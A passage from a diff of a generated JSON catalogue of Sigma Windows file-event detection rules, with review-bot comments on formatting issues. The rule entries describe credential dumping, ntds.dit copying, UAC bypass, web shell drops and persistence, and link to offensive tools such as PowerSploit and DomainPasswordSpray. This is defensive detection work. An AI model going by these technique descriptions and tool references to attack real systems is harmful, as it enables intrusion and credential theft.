Inveigh via dropped artefacts", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_inveigh_artefacts.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", + "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml" + ], + "tags": [ + "attack.command_and_control", + 
"attack.t1219" + ] + }, + "uuid": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "value": "Inveigh Execution Artefacts" }, { "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", 
@@ -24047,178 +25004,191 @@ "value": "Created Files by Microsoft Sync Center" }, { - "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", + "description": "Detects anydesk writing binaries files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it's highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that's part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", "meta": { - "author": "elhoim", - "creation_date": "2022/04/28", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/28", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_susp_default_gpo_dir_write.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml" - ], - "tags": [ - "attack.t1036.005", - "attack.defense_evasion" - ] - }, - "uuid": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", - "value": "Suspicious Files in Default GPO Folder" - }, - { - "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/03", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "filename": "file_event_win_susp_desktopimgdownldr_file.yml", + "filename": "file_event_win_anydesk_writing_susp_binaries.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", - 
"https://twitter.com/SBousseaden/status/1278977301745741825", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml" + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1105" + "attack.command_and_control", + "attack.t1219" ] }, - "uuid": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", - "value": "Suspicious Desktopimgdownldr Target File" + "uuid": "2d367498-5112-4ae5-a06a-96e7bc33a211", + "value": "Suspicious Binary Writes Via AnyDesk" }, { - "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. 
Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.", "meta": { - "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", - "creation_date": "2020/03/19", - "falsepositive": [ - "Operations performed through Windows SCCM or equivalent", - "Read only access list authority" + "author": "Greg (rule)", + "creation_date": "2022/07/21", + "falsepositive": "No established falsepositives", + "filename": "file_event_win_ripzip_attack.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ripzip_attack.yml" ], - "filename": "file_event_win_susp_desktop_ini.yml", + "tags": [ + "attack.t1547", + "attack.persistence" + ] + }, + "uuid": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "value": "RipZip Attack on Startup Folder" + }, + { + "description": "Detects the use of Advanced IP Scanner. 
Seems to be a popular tool for ransomware groups.", + "meta": { + "author": "@ROxPinTeddy", + "creation_date": "2020/05/12", + "falsepositive": [ + "Legitimate administrative use" + ], + "filename": "file_event_win_advanced_ip_scanner.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_ini.yml" + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "fed85bf9-e075-4280-9159-fbe8a023d6fa", + "value": "Advanced IP Scanner - File Event" + }, + { + "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. 
Setup.exe) fail to run for any reason.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_error_handler_cmd_persistence.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/", + "https://github.com/last-byte/PersistenceSniper", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "15904280-565c-4b73-9303-3291f964e7f9", + "value": "Potential Persistence Attempt Via ErrorHandler.Cmd" + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_wmp.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "68578b43-65df-4f81-9a9b-92f32711a951", + "value": "UAC Bypass Using Windows Media Player - File" + }, + { + "description": "Detects the creation of known powershell scripts for exploitation", + "meta": { + "author": "Markus Neis, Nasreddine Bencherchali, Mustafa Kaan Demir, Georg Lauenstein", + "creation_date": "2018/04/07", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_powershell_exploit_scripts.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/nettitude/Invoke-PowerThIEf", + 
"https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/CsEnox/EventViewer-UACBypass", + "https://github.com/S3cur3Th1sSh1t/WinPwn", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/NetSPI/PowerUpSQL", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/AlsidOfficial/WSUSpendu/", + "https://github.com/PowerShellMafia/PowerSploit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "value": "Malicious PowerShell Commandlets - FileCreation" + }, + { + "description": "Detects suspicious file type dropped by an Exchange component in IIS", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/04", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_exchange_webshell_drop_suspicious.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + 
"https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" ], "tags": [ "attack.persistence", - "attack.t1547.009" + "attack.t1190", + "attack.initial_access", + "attack.t1505.003" ] }, - "uuid": "81315b50-6b60-4d8f-9928-3466e1022515", - "value": "Suspicious desktop.ini Action" - }, - { - "description": "Ransomware create txt file in the user Desktop", - "meta": { - "author": "frack113", - "creation_date": "2021/12/26", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_susp_desktop_txt.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_txt.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ] - }, - "uuid": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", - "value": "Suspicious Creation TXT File in User Desktop" - }, - { - "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", - "meta": { - "author": "frack113", - "creation_date": "2022/06/08", - "falsepositive": [ - "Legitimate microsoft diagcab" - ], - "filename": "file_event_win_susp_diagcab.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://threadreaderapp.com/thread/1533879688141086720.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_diagcab.yml" - ], - "tags": [ - "attack.resource_development" - ] - }, - "uuid": 
"3d0ed417-3d94-4963-a562-4a92c940656a", - "value": "Creation of a Diagcab" - }, - { - "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "meta": { - "author": "Nasreddine Bencherchali, frack113", - "creation_date": "2022/06/19", - "falsepositive": [ - "Unlikely" - ], - "filename": "file_event_win_susp_double_extension.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", - "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", - "https://twitter.com/malwrhunterteam/status/1235135745611960321", - "https://twitter.com/luc4m/status/1073181154126254080", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.007" - ] - }, - "uuid": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", - "value": "Suspicious Double Extension Files" - }, - { - "description": "Detects the creation of an executable by another executable", - "meta": { - "author": "frack113", - "creation_date": "2022/03/09", - "falsepositive": [ - "Software installers", - "Update utilities" - ], - "filename": "file_event_win_susp_dropper.yml", - "level": "low", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "Malware Sandbox", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_dropper.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ] - }, - "uuid": "297afac9-5d02-4138-8c58-b977bac60556", - "value": "Creation of an Executable by an 
Executable" + "uuid": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "value": "Suspicious File Drop by Exchange" }, { "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", 
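Review bot: `"falsepositive": "No established falsepositives"` in the new `RipZip Attack on Startup Folder` entry gives the field a string type while every other entry in this hunk carries an array (`"falsepositive": [ "Unknown" ]`), so a consumer that iterates the list will break or silently mis-handle this record. This looks like a generator fallback for a rule that has no falsepositives key; emitting `"falsepositive": [ "Unknown" ]` (or an empty array) keeps the type stable, and fixing the fallback in the generator would stop it recurring elsewhere in this 63k-line file. The description of `Suspicious Binary Writes Via AnyDesk` also reads `anydesk writing binaries files` where `binary files` is meant, presumably copied from the upstream rule text.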
@@ -24247,135 +25217,81 @@ "value": "Suspicious MSExchangeMailboxReplication ASPX Write" }, { - "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "meta": { - "author": "frack113", - "creation_date": "2022/09/05", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_susp_executable_creation.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae", - "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564" - ] - }, - "uuid": "74babdd6-a758-4549-9632-26535279e654", - "value": "Suspicious Executable File Creation" - }, - { - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/04/23", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_susp_get_variable.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", - "https://www.joesandbox.com/analysis/465533/0/html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml" - ], - "tags": [ - 
"attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", - "value": "Suspicious Get-Variable.exe Creation" - }, - { - "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "meta": { - "author": "Nasreddine Bencherchali, frack113", - "creation_date": "2022/11/07", - "falsepositive": [ - "Users creating a shortcut on e.g. desktop" - ], - "filename": "file_event_win_susp_lnk_double_extension.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", - "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", - "https://twitter.com/malwrhunterteam/status/1235135745611960321", - "https://twitter.com/luc4m/status/1073181154126254080", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.007" - ] - }, - "uuid": "3215aa19-f060-4332-86d5-5602511f3ca8", - "value": "Suspicious LNK Double Extension Files" - }, - { - "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/11", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_susp_ntds_dit.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/", - "https://adsecurity.org/?p=2398", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" - ] - }, - "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720", - "value": "Suspicious Process Writes Ntds.dit" - }, - { - "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", + "description": "Detects processes creating temp files related to PCRE.NET package", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", + "creation_date": "2020/10/29", "falsepositive": [ - "System administrators managing certififcates." + "Unknown" ], - "filename": "file_event_win_susp_pfx_file_creation.yml", - "level": "medium", + "filename": "file_event_win_pcre_net_temp_file.yml", + "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/14", - "https://threathunterplaybook.com/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml" + "https://twitter.com/tifkin_/status/1321916444557365248", + "https://twitter.com/rbmaslen/status/1321859647091970051", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "value": "PCRE.NET Package Temp Files" + }, + { + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "meta": { + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "creation_date": "2020/05/26", + 
"falsepositive": [ + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" + ], + "filename": "file_event_win_creation_system_file.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_system_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "value": "Files With System Process Name In Unsuspected Locations" + }, + { + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/11/01", + "falsepositive": [ + "Legitimate Administrator using tool for password recovery" + ], + "filename": "file_event_win_cred_dump_tools_dropped_files.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml" ], "tags": [ "attack.credential_access", - "attack.t1552.004" + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ] }, - "uuid": "dca1b3e8-e043-4ec8-85d7-867f334b5724", - "value": "Suspicious PFX File Creation" + "uuid": "8fbf3271-1ef6-4e94-8210-03c2317947f6", + "value": "Cred Dump Tools Dropped Files" }, { "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", 
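Review bot: The entry with uuid `74babdd6-a758-4549-9632-26535279e654` (`Suspicious Executable File Creation`) is deleted in this hunk, yet the same uuid and value are added in an earlier hunk of this file, so much of the 135-line removal here appears to be positional churn rather than a content change. If the generator wrote clusters in a stable order (for example sorted by `uuid` or `meta.filename`), a regenerated galaxy would diff down to the genuine additions and edits, which is what a reviewer of a generated file of this size needs. The other entries added here keep `falsepositive`, `refs` and `tags` as arrays, consistent with the rest of the cluster.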
@@ -24383,15 +25299,15 @@ "author": "HieuTT35, Nasreddine Bencherchali", "creation_date": "2019/10/24", "falsepositive": [ - "System administrator create Powershell profile manually" + "System administrator creating Powershell profile manually" ], "filename": "file_event_win_susp_powershell_profile.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://persistence-info.github.io/Data/powershellprofile.html", + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml" ], "tags": [ 
@@ -24404,269 +25320,28 @@ "value": "PowerShell Profile Modification" }, { - "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", - "meta": { - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", - "creation_date": "2019/04/08", - "falsepositive": [ - "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." - ], - "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" - ], - "tags": [ - "attack.t1562.001", - "attack.defense_evasion" - ] - }, - "uuid": "3da70954-0f2c-4103-adff-b7440368f50e", - "value": "Suspicious PROCEXP152.sys File Created In TMP" - }, - { - "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/28", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_susp_spool_drivers_color_drop.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "ce7066a6-508a-42d3-995b-2952c65dc2ce", - "value": "Drop Binaries Into Spool Drivers Color Folder" - }, - { - "description": "Detects when a file with a suspicious extension is created in the startup folder", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/10", - "falsepositive": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" - ], - "filename": "file_event_win_susp_startup_folder_persistence.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/last-byte/PersistenceSniper", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "28208707-fe31-437f-9a7f-4b1108b94d2e", - "value": "Suspicious Startup Folder Persistence" - }, - { - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/07", - "falsepositive": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" - ], - "filename": "file_event_win_susp_system_interactive_powershell.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml" - ], - "tags": "No established tags" - }, - "uuid": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", - "value": "Suspicious Interactive PowerShell as SYSTEM" - }, - { - "description": 
"Detects the creation of tasks from processes executed from suspicious locations", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/16", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_susp_task_write.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_task_write.yml" - ], - "tags": [ - "attack.persistence", - "attack.execution", - "attack.t1053" - ] - }, - "uuid": "80e1f67a-4596-4351-98f5-a9c3efabac95", - "value": "Suspicious Scheduled Task Write to System32 Tasks" - }, - { - "description": "Detects the creation of log files during a TeamViewer remote session", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/30", - "falsepositive": [ - "Legitimate uses of TeamViewer in an organisation" - ], - "filename": "file_event_win_susp_teamviewer_remote_session.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.teamviewer.com/en-us/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "162ab1e4-6874-4564-853c-53ec3ab8be01", - "value": "TeamViewer Remote Session" - }, - { - "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/24", - "falsepositive": [ - "Legitimate use of the profile by developers or administrators" - ], - "filename": "file_event_win_susp_vscode_powershell_profile.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - 
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" - ] - }, - "uuid": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", - "value": "VsCode Powershell Profile Modification" - }, - { - "description": "Detects the creation of an file in user Word Startup", + "description": "TeamViewer_Desktop.exe is create during install", "meta": { "author": "frack113", - "creation_date": "2022/06/05", + "creation_date": "2022/01/28", "falsepositive": [ - "Addition of legitimate plugins" + "Unknown" ], - "filename": "file_event_win_susp_winword_startup.yml", + "filename": "file_event_win_install_teamviewer_desktop.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winword_startup.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ] - }, - "uuid": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", - "value": "Creation In User Word Startup Folder" - }, - { - "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/06/12", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_tool_psexec.yml", - "level": "low", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tool_psexec.yml" - ], - 
